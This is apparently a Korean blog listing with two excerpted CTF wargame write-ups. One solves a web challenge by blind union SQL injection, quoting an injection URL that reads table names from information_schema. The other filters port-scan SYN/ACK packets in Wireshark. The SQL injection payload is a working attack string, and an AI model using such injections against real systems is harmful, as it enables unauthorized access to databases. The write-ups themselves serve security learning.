khwargame
![[KH Wargame] Web07 풀이](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FNX8ut%2FbtqGfN8J4IB%2FEVSBWWdqMWgWUZYJTLHKYk%2Fimg.png)
[KH Wargame] Web07 풀이
풀이 flag is in the DB. Blind Union SQL Injection 문제이다. 해당 문제에 들어가면 no=1 ~ 12까지 사진이 올려져있는데, no 부분에서 SQLi가 발생한다. 간단하게 ?no=1 or 1=1 해보면 나온다. 설명은 다른 문제에서도 많이 했으니 테이블 이름과 최종 flag를 찾는 쿼리만 올리도록 하겠다. 테이블 쿼리 http://wargame.iei.or.kr:30006/image.php?no=0 and 1 union select 1,table_name,3,4 from information_schema.tables limit 51,1%23 flag 쿼리 http://wargame.iei.or.kr:30006/image.php?no=0 and 1 union select ..
![[KH Wargame] Network04 풀이](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbbbIzq%2FbtqGmPqeC0E%2Fxk5KbSdm2rccgho70eLtek%2Fimg.png)
[KH Wargame] Network04 풀이
풀이 로컬 네트워크에 존재하는 Hacker가 서비스 중인 Port 번호들을 알아냄. * Port 번호가 여러개일 경우 /로 구분지어 작은 번호부터 나열. 정답 형식: flag의 md5 해쉬 값 간단하게 풀 수 있는 문제다. Hacker가 서버에 포트 스캔을 날린 것이니, Wireshark 필터를 다음과 같이 설정해 SYN/ACK 패킷만 걸러보자. 참고로, 패킷을 분석해보면 Hacker가 192.168.0.100의 아이피로 포트스캔을 날렸다는 것을 알 수 있다. ip.addr == 192.168.0.100 && tcp.flags == 0x12 이제 순서대로 나열하고 해쉬 값을 인증하면 끝.